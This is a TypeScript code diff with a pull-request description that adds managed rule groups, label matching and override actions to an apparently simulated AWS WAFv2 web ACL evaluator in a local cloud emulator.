@@ -1,0 +1,46 @@
+import type { SimWafMatcher } from "./sim-waf-field-match.js";
+import { invalidSimWafRule } from "./sim-waf-rule-refusals.js";
+
+/**
+ * Minimal structural WAFv2 LabelMatchStatement.
+ */
+export interface SimWafLabelMatchStatementInput {
+  readonly Scope?: string | undefined;
+  readonly Key?: string | undefined;
+}
+
+/**
+ * Build the matcher for a statement that reads the labels a request picked up.
+ *
+ * The labels come from the rules that already ran, so a label match reads what
+ * the rules at lower priorities left behind. That is the whole of the pattern
+ * teams tune a managed rule group with: run the group in count mode, and block
+ * on the label of the one rule in it that matters.
+ *
+ * A `LABEL` scope matches the fully qualified name of one label, and a
+ * `NAMESPACE` scope matches every label under a prefix, so one rule can block
+ * on anything the core rule set claimed.
+ */
+export function compileSimWafLabelMatch(
+  statement: SimWafLabelMatchStatementInput,
+  ruleName: string,
+): SimWafMatcher {
+  const { Key: key, Scope: scope } = statement;
+
+  if (key === undefined || key === "") {
+    invalidSimWafRule(ruleName, "A LabelMatchStatement needs a Key to match");
+  }
+
+  if (scope === "LABEL") {
+    return (request): boolean => request.labels.has(key);
+  }
+
+  if (scope === "NAMESPACE") {
+    return (request): boolean => request.labels.hasNamespace(key);
+  }
+
+  invalidSimWafRule(
+    ruleName,
+    `The label match scope ${String(scope)} is LABEL or NAMESPACE`,
+  );
+}

--- a/src/service/wafv2/statement/sim-waf-statement.ts
+++ b/src/service/wafv2/statement/sim-waf-statement.ts
@@ -9,6 +9,7 @@ import {
   simWafRegexPatternSetTest,
   simWafRegexTest,
 } from "./sim-waf-regex-match.js";
+import { compileSimWafLabelMatch } from "./sim-waf-label-match.js";
 import { compileSimWafLogicalStatement } from "./sim-waf-logical-statement.js";
 import { invalidSimWafRule } from "./sim-waf-rule-refusals.js";
 import { simWafSizeTest } from "./sim-waf-size-constraint.js";
@@ -45,6 +46,21 @@ export function compileSimWafStatement(
   }
 
   refuseUnsimulatedSimWafStatement(statement, ruleName);
+
+  if (statement.ManagedRuleGroupStatement !== undefined) {
+    // A rule group statement is the whole of a rule's statement on real WAFv2
+    // as well, so one nested inside another statement is refused rather than
+    // evaluated somewhere it could not carry its own actions.
+    invalidSimWafRule(
+      ruleName,
+      "A ManagedRuleGroupStatement is the whole of a rule's statement, and " +
+        "cannot be joined to or nested inside another one",
+    );
+  }
+
+  if (statement.LabelMatchStatement !== undefined) {
+    return compileSimWafLabelMatch(statement.LabelMatchStatement, ruleName);
+  }
 
   return (
     compileFieldStatement(statement, scope) ??

--- a/src/service/wafv2/statement/sim-waf-statement.type.ts
+++ b/src/service/wafv2/statement/sim-waf-statement.type.ts
@@ -1,4 +1,6 @@
+import type { SimWafManagedRuleGroupStatementInput } from "../managed/sim-waf-managed-group.type.js";
 import type { SimWafByteMatchStatementInput } from "./sim-waf-byte-match.js";
+import type { SimWafLabelMatchStatementInput } from "./sim-waf-label-match.js";
 import type { SimWafFieldToMatchInput } from "./sim-waf-field-to-match.type.js";
 import type {
   SimWafRegexMatchStatementInput,
@@ -54,7 +56,9 @@ export interface SimWafStatementInput {
   readonly RateBasedStatement?: unknown;
   readonly SqliMatchStatement?: unknown;
   readonly XssMatchStatement?: unknown;
-  readonly LabelMatchStatement?: unknown;
+  readonly LabelMatchStatement?: SimWafLabelMatchStatementInput | undefined;
+  readonly ManagedRuleGroupStatement?:
+    | SimWafManagedRuleGroupStatementInput
+    | undefined;
   readonly RuleGroupReferenceStatement?: unknown;
-  readonly ManagedRuleGroupStatement?: unknown;
 }

--- a/src/service/wafv2/statement/sim-waf-unsimulated-statement.ts
+++ b/src/service/wafv2/statement/sim-waf-unsimulated-statement.ts
@@ -26,16 +26,6 @@ const refusedStatements = new Map<string, string>([
       "feasible and is not part of this",
   ],
   [
-    "LabelMatchStatement",
-    "nothing here adds a label to a request, and labels arrive with the AWS " +
-      "managed rule groups",
-  ],
-  [
-    "ManagedRuleGroupStatement",
-    "the AWS managed rule groups are a body of rules Yulin would have to " +
-      "carry, and they have an issue of their own",
-  ],
-  [
     "RuleGroupReferenceStatement",
     "a rule group is a resource in its own right, and none is simulated",
   ],

--- a/src/service/wafv2/web-acl/sim-waf-rule-evaluator.ts
+++ b/src/service/wafv2/web-acl/sim-waf-rule-evaluator.ts
@@ -1,0 +1,64 @@
+import { compileSimWafManagedRuleGroup } from "../managed/sim-waf-managed-group-statement.js";
+import { invalidSimWafRule } from "../statement/sim-waf-rule-refusals.js";
+import { compileSimWafStatement } from "../statement/sim-waf-statement.js";
+import { SimWafAction } from "./sim-waf-action.js";
+import type {
+  SimWafRuleEvaluator,
+  SimWafRuleInput,
+  SimWafRuleScope,
+} from "./sim-waf-rule.type.js";
+
+/**
+ * Compile what one rule does with a request.
+ *
+ * A rule naming a managed rule group is the one rule that decides by something
+ * other than its own action, so it is the one branch here. Real WAFv2 draws
+ * the same line: a rule carries an `Action` or it names a rule group and
+ * carries an `OverrideAction`, and never both.
+ */
+export function compileSimWafRuleEvaluator(
+  input: SimWafRuleInput,
+  ruleName: string,
+  scope: SimWafRuleScope,
+): SimWafRuleEvaluator {
+  const managed = input.Statement?.ManagedRuleGroupStatement;
+
+  if (managed !== undefined) {
+    if (input.Action !== undefined) {
+      invalidSimWafRule(
+        ruleName,
+        "A rule naming a rule group takes an OverrideAction rather than an " +
+          "Action, since the action comes from the rule inside the group " +
+          "that claimed the request",
+      );
+    }
+
+    return compileSimWafManagedRuleGroup({
+      statement: managed,
+      overrideAction: input.OverrideAction,
+      ruleName,
+      scope,
+    });
+  }
+
+  if (input.OverrideAction !== undefined) {
+    invalidSimWafRule(
+      ruleName,
+      "An OverrideAction applies to a rule group statement, and this rule " +
+        "names no rule group",
+    );
+  }
+
+  const action = SimWafAction.read(
+    input.Action,
+    ruleName,
+    scope.customResponseBodies,
+  );
+  const matches = compileSimWafStatement(input.Statement, {
+    regexPatternSets: scope.regexPatternSets,
+    ruleName,
+  });
+
+  return (request): SimWafAction | undefined =>
+    matches(request) ? action : undefined;
+}

--- a/src/service/wafv2/web-acl/sim-waf-rule-input.ts
+++ b/src/service/wafv2/web-acl/sim-waf-rule-input.ts
@@ -13,15 +13,6 @@ const browserAnswered =
  * The rule members real WAFv2 takes and this simulation does not.
  */
 const refusedMembers = new Map<string, string>([
-  [
-    "OverrideAction",
-    "it only applies to a rule group statement, and no rule group is simulated",
-  ],
-  [
-    "RuleLabels",
-    "nothing here reads a label, since LabelMatchStatement arrives with the " +
-      "AWS managed rule groups",
-  ],
   ["CaptchaConfig", browserAnswered],
   ["ChallengeConfig", browserAnswered],
 ]);

--- a/src/service/wafv2/web-acl/sim-waf-rule-labels.ts
+++ b/src/service/wafv2/web-acl/sim-waf-rule-labels.ts
@@ -1,0 +1,28 @@
+import { invalidSimWafRule } from "../statement/sim-waf-rule-refusals.js";
+
+/**
+ * Minimal structural WAFv2 Label, which a rule adds to a request it matches.
+ */
+export interface SimWafLabelInput {
+  readonly Name?: string | undefined;
+}
+
+/**
+ * Read the labels a rule adds to the requests it claims.
+ *
+ * A label a rule of the web ACL's own adds carries no prefix, where a label
+ * from a rule group is qualified by the group it came from. That is AWS's own
+ * rule, and it is what a `LabelMatchStatement` key has to be written to match.
+ */
+export function simWafRuleLabels(
+  labels: readonly SimWafLabelInput[] | undefined,
+  ruleName: string,
+): readonly string[] {
+  return (labels ?? []).map((label) => {
+    if (label.Name === undefined || label.Name === "") {
+      invalidSimWafRule(ruleName, "A rule label needs a Name");
+    }
+
+    return label.Name;
+  });
+}

--- a/src/service/wafv2/web-acl/sim-waf-rule.factory.ts
+++ b/src/service/wafv2/web-acl/sim-waf-rule.factory.ts
@@ -41,3 +41,29 @@ export const simWafRuleFactory = new DynamicFactory<SimWafRuleInput>(() => ({
   },
   VisibilityConfig: simWafVisibilityConfig,
 }));
+
+/**
+ * Makes rules that run the AWS core rule set as it comes.
+ *
+ * `Statement` and `OverrideAction` are replaced whole rather than overridden,
+ * for the reason the statement of any other rule is: each of them holds one
+ * thing at a time, and a merge would leave a rule naming two.
+ *
+ * A rule that names a rule group carries an `OverrideAction` where any other
+ * rule carries an `Action`, since what it does to a request comes from
+ * whichever rule inside the group claimed it.
+ */
+export const simWafManagedRuleFactory = new DynamicFactory<SimWafRuleInput>(
+  () => ({
+    Name: `managed-${faker.string.alphanumeric(8)}`,
+    Priority: 0,
+    OverrideAction: { None: {} },
+    Statement: {
+      ManagedRuleGroupStatement: {
+        VendorName: "AWS",
+        Name: "AWSManagedRulesCommonRuleSet",
+      },
+    },
+    VisibilityConfig: simWafVisibilityConfig,
+  }),
+);

--- a/src/service/wafv2/web-acl/sim-waf-rule.ts
+++ b/src/service/wafv2/web-acl/sim-waf-rule.ts
@@ -1,40 +1,44 @@
 import type { SimWafInspectedRequest } from "../evaluate/sim-waf-inspected-request.js";
-import type { SimWafMatcher } from "../statement/sim-waf-field-match.js";
-import { compileSimWafStatement } from "../statement/sim-waf-statement.js";
-import { SimWafAction } from "./sim-waf-action.js";
+import type { SimWafAction } from "./sim-waf-action.js";
 import {
   refuseUnsimulatedSimWafRuleInput,
   requiredSimWafRuleName,
   requiredSimWafRulePriority,
 } from "./sim-waf-rule-input.js";
-import type { SimWafRuleInput, SimWafRuleScope } from "./sim-waf-rule.type.js";
+import { simWafRuleLabels } from "./sim-waf-rule-labels.js";
+import { compileSimWafRuleEvaluator } from "./sim-waf-rule-evaluator.js";
+import type {
+  SimWafRuleEvaluator,
+  SimWafRuleInput,
+  SimWafRuleScope,
+} from "./sim-waf-rule.type.js";
 
 interface SimWafRuleProperties {
   readonly name: string;
   readonly priority: number;
-  readonly action: SimWafAction;
-  readonly matcher: SimWafMatcher;
+  readonly labels: readonly string[];
+  readonly evaluate: SimWafRuleEvaluator;
 }
 
 /**
  * One rule of a web ACL, compiled so a request can be evaluated against it.
  *
- * The statement is turned into a matcher when the web ACL is written, which is
- * what lets a rule Yulin cannot evaluate be refused at that point rather than
- * silently letting requests past later on.
+ * The statement is turned into an evaluator when the web ACL is written, which
+ * is what lets a rule Yulin cannot evaluate be refused at that point rather
+ * than silently letting requests past later on.
  */
 export class SimWafRule {
   public readonly name: string;
   public readonly priority: number;
-  public readonly action: SimWafAction;
 
-  readonly #matcher: SimWafMatcher;
+  readonly #labels: readonly string[];
+  readonly #evaluate: SimWafRuleEvaluator;
 
   private constructor(properties: SimWafRuleProperties) {
     this.name = properties.name;
     this.priority = properties.priority;
-    this.action = properties.action;
-    this.#matcher = properties.matcher;
+    this.#labels = properties.labels;
+    this.#evaluate = properties.evaluate;
   }
 
   /**
@@ -48,18 +52,28 @@ export class SimWafRule {
     return new SimWafRule({
       name,
       priority: requiredSimWafRulePriority(input.Priority, name),
-      action: SimWafAction.read(input.Action, name, scope.customResponseBodies),
-      matcher: compileSimWafStatement(input.Statement, {
-        regexPatternSets: scope.regexPatternSets,
-        ruleName: name,
-      }),
+      labels: simWafRuleLabels(input.RuleLabels, name),
+      evaluate: compileSimWafRuleEvaluator(input, name, scope),
     });
   }
 
   /**
-   * Whether this rule claims a request.
+   * What this rule does with a request, which is nothing when it does not
+   * claim it.
+   *
+   * A rule labels the requests it claims whatever action it goes on to take,
+   * counted ones included, because a label is how a rule that runs later finds
+   * out this one matched.
    */
-  matches(request: SimWafInspectedRequest): boolean {
-    return this.#matcher(request);
+  evaluate(request: SimWafInspectedRequest): SimWafAction | undefined {
+    const action = this.#evaluate(request);
+
+    if (action !== undefined) {
+      for (const label of this.#labels) {
+        request.labels.add(label);
+      }
+    }
+
+    return action;
   }
 }

--- a/src/service/wafv2/web-acl/sim-waf-rule.type.ts
+++ b/src/service/wafv2/web-acl/sim-waf-rule.type.ts
@@ -1,8 +1,13 @@
+import type { SimWafOverrideActionInput } from "../managed/sim-waf-managed-group.type.js";
+import type { SimWafManagedRules } from "../managed/sim-waf-managed-rules.js";
 import type { SimWafRegexPatternSet } from "../regex-pattern-set/sim-waf-regex-pattern-set.js";
 import type { SimWafResourceStore } from "../resource/sim-waf-resource-store.js";
+import type { SimWafInspectedRequest } from "../evaluate/sim-waf-inspected-request.js";
 import type { SimWafStatementInput } from "../statement/sim-waf-statement.type.js";
+import type { SimWafAction } from "./sim-waf-action.js";
 import type { SimWafActionInput } from "./sim-waf-action.type.js";
 import type { SimWafCustomResponseBodies } from "./sim-waf-custom-response.type.js";
+import type { SimWafLabelInput } from "./sim-waf-rule-labels.js";
 
 /**
  * Minimal structural WAFv2 Rule.
@@ -14,17 +19,37 @@ export interface SimWafRuleInput {
   readonly Priority?: number | undefined;
   readonly Statement?: SimWafStatementInput | undefined;
   readonly Action?: SimWafActionInput | undefined;
-  readonly OverrideAction?: unknown;
-  readonly RuleLabels?: readonly unknown[] | undefined;
+  readonly OverrideAction?: SimWafOverrideActionInput | undefined;
+  readonly RuleLabels?: readonly SimWafLabelInput[] | undefined;
   readonly CaptchaConfig?: unknown;
   readonly ChallengeConfig?: unknown;
   readonly VisibilityConfig?: unknown;
 }
 
 /**
+ * What a web ACL brings to compiling its rules, which is everything a rule is
+ * compiled against bar the custom responses it was written with.
+ */
+export interface SimWafWebAclRuleScope {
+  readonly regexPatternSets: SimWafResourceStore<SimWafRegexPatternSet>;
+  readonly managedRules: SimWafManagedRules;
+}
+
+/**
  * What a rule is compiled against.
  */
-export interface SimWafRuleScope {
-  readonly regexPatternSets: SimWafResourceStore<SimWafRegexPatternSet>;
+export interface SimWafRuleScope extends SimWafWebAclRuleScope {
   readonly customResponseBodies: SimWafCustomResponseBodies;
 }
+
+/**
+ * What one compiled rule does with a request.
+ *
+ * A rule that claims the request answers with the action to apply, and one
+ * that does not answers with nothing. The action is not the rule's own for
+ * every rule: a rule naming a managed rule group answers with the action of
+ * whichever rule inside the group claimed the request.
+ */
+export type SimWafRuleEvaluator = (
+  request: SimWafInspectedRequest,
+) => SimWafAction | undefined;

--- a/src/service/wafv2/web-acl/sim-waf-rules.ts
+++ b/src/service/wafv2/web-acl/sim-waf-rules.ts
@@ -1,6 +1,27 @@
 import { SimWafInvalidParameterException } from "../error/sim-wafv2.error.js";
 import { SimWafRule } from "./sim-waf-rule.js";
-import type { SimWafRuleInput, SimWafRuleScope } from "./sim-waf-rule.type.js";
+import type {
+  SimWafRuleInput,
+  SimWafRuleScope,
+  SimWafWebAclRuleScope,
+} from "./sim-waf-rule.type.js";
+import type { SimWafWebAclConfiguration } from "./sim-waf-web-acl-configuration.js";
+
+/**
+ * Compile the rules a web ACL was written with.
+ *
+ * The custom response bodies are part of the configuration and the rest of the
+ * scope belongs to the web ACL, which is what this puts together.
+ */
+export function compileSimWafWebAclRules(
+  configuration: SimWafWebAclConfiguration,
+  scope: SimWafWebAclRuleScope,
+): readonly SimWafRule[] {
+  return compileSimWafRules(configuration.rules, {
+    ...scope,
+    customResponseBodies: configuration.customResponseBodies ?? {},
+  });
+}
 
 /**
  * Compile a web ACL's rules into the order they are evaluated in.

--- a/src/service/wafv2/web-acl/sim-waf-web-acl.ts
+++ b/src/service/wafv2/web-acl/sim-waf-web-acl.ts
@@ -1,23 +1,25 @@
-import type { SimWafDecision } from "../evaluate/sim-waf-decision.js";
+import {
+  simWafDecision,
+  type SimWafDecision,
+} from "../evaluate/sim-waf-decision.js";
 import type { SimWafInspectedRequest } from "../evaluate/sim-waf-inspected-request.js";
-import type { SimWafRegexPatternSet } from "../regex-pattern-set/sim-waf-regex-pattern-set.js";
+import { simWafEvaluateRules } from "../evaluate/sim-waf-evaluate-rules.js";
 import {
   SimWafResource,
   type SimWafResourceProperties,
 } from "../resource/sim-waf-resource.js";
-import type { SimWafResourceStore } from "../resource/sim-waf-resource-store.js";
 import type { SimWafAction } from "./sim-waf-action.js";
-import type { SimWafHeader } from "./sim-waf-custom-response.type.js";
 import type { SimWafRule } from "./sim-waf-rule.js";
-import { compileSimWafRules } from "./sim-waf-rules.js";
+import type { SimWafWebAclRuleScope } from "./sim-waf-rule.type.js";
+import { compileSimWafWebAclRules } from "./sim-waf-rules.js";
 import {
   readSimWafDefaultAction,
   type SimWafWebAclConfiguration,
 } from "./sim-waf-web-acl-configuration.js";
 
-interface SimWafWebAclProperties extends SimWafResourceProperties {
+interface SimWafWebAclProperties
+  extends SimWafResourceProperties, SimWafWebAclRuleScope {
   readonly configuration: SimWafWebAclConfiguration;
-  readonly regexPatternSets: SimWafResourceStore<SimWafRegexPatternSet>;
 }
 
 /**
@@ -31,7 +33,7 @@ interface SimWafWebAclProperties extends SimWafResourceProperties {
  * default action.
  */
 export class SimWafWebAcl extends SimWafResource {
-  readonly #regexPatternSets: SimWafResourceStore<SimWafRegexPatternSet>;
+  readonly #scope: SimWafWebAclRuleScope;
 
   #configuration: SimWafWebAclConfiguration;
   #defaultAction: SimWafAction;
@@ -40,10 +42,13 @@ export class SimWafWebAcl extends SimWafResource {
   constructor(properties: SimWafWebAclProperties) {
     super("webacl", properties);
 
-    this.#regexPatternSets = properties.regexPatternSets;
+    this.#scope = properties;
     this.#configuration = properties.configuration;
     this.#defaultAction = readSimWafDefaultAction(properties.configuration);
-    this.#rules = this.compileRules(properties.configuration);
+    this.#rules = compileSimWafWebAclRules(
+      properties.configuration,
+      this.#scope,
+    );
   }
 
   /**
@@ -64,7 +69,7 @@ export class SimWafWebAcl extends SimWafResource {
     lockToken: string | undefined,
   ): void {
     const defaultAction = readSimWafDefaultAction(configuration);
-    const rules = this.compileRules(configuration);
+    const rules = compileSimWafWebAclRules(configuration, this.#scope);
 
     this.takeLock(lockToken);
     this.replaceDescription(configuration.description);
@@ -77,53 +82,14 @@ export class SimWafWebAcl extends SimWafResource {
    * Decide what happens to one request.
    */
   evaluate(request: SimWafInspectedRequest): SimWafDecision {
-    const counted: string[] = [];
-    const inserted: SimWafHeader[] = [];
+    const outcome = simWafEvaluateRules(this.#rules, request);
 
-    for (const rule of this.#rules) {
-      if (!rule.matches(request)) {
-        continue;
-      }
-
-      inserted.push(...rule.action.insertHeaders);
-
-      if (rule.action.isTerminating) {
-        return this.decision(rule.action, rule.name, counted, inserted);
-      }
-
-      counted.push(rule.name);
-    }
-
-    return this.decision(this.#defaultAction, undefined, counted, inserted);
-  }
-
-  private decision(
-    action: SimWafAction,
-    terminatingRuleName: string | undefined,
-    countedRuleNames: readonly string[],
-    insertedHeaders: readonly SimWafHeader[],
-  ): SimWafDecision {
-    const blocking = action.kind === "BLOCK";
-
-    return {
-      action: blocking ? "BLOCK" : "ALLOW",
+    return simWafDecision({
+      ...outcome,
+      action: outcome.action ?? this.#defaultAction,
       webAclName: this.name,
       webAclArn: this.arn,
-      terminatingRuleName,
-      countedRuleNames,
-      // Nothing is forwarded when the request is blocked, so there is nothing
-      // for a rule's inserted headers to be added to.
-      insertedHeaders: blocking ? [] : insertedHeaders,
-      blocked: action.blocked,
-    };
-  }
-
-  private compileRules(
-    configuration: SimWafWebAclConfiguration,
-  ): readonly SimWafRule[] {
-    return compileSimWafRules(configuration.rules, {
-      regexPatternSets: this.#regexPatternSets,
-      customResponseBodies: configuration.customResponseBodies ?? {},
+      labels: request.labels.all(),
     });
   }
 }


### PR DESCRIPTION
A stack that turns the AWS core rule set on could not deploy under Yulin, because `ManagedRuleGroupStatement` was refused. `AWSManagedRulesCommonRuleSet`, `AWSManagedRulesKnownBadInputsRuleSet` and `AWSManagedRulesAdminProtectionRuleSet` are accepted now, evaluating their rules in the order AWS documents and adding the documented `awswaf:managed:aws:*` label to a request a rule claims. Every rule declares how closely it follows the AWS rule it stands for. The four size restrictions and a handful of other conditions match exactly, the rest match the patterns AWS published and nothing beyond them, and the four cross-site scripting rules match a request a test declared a match for through `managedRules()`, which reports the tier of every rule as well. The tiers under-detect and never over-detect, so a test asking whether an application's own traffic still gets through is never failed by a rule AWS would not have blocked on. `RuleActionOverrides`, `ScopeDownStatement` and `OverrideAction` behave as AWS documents them, `LabelMatchStatement` and a rule's own `RuleLabels` arrive alongside, and `DescribeManagedRuleGroup` reports the rules and labels a simulated group holds.

It lands at about 3,600 lines, over the usual sizing steer. Roughly 800 of those are the rule tables for the three groups, 1,200 are tests and 450 are documentation.

Resolves #810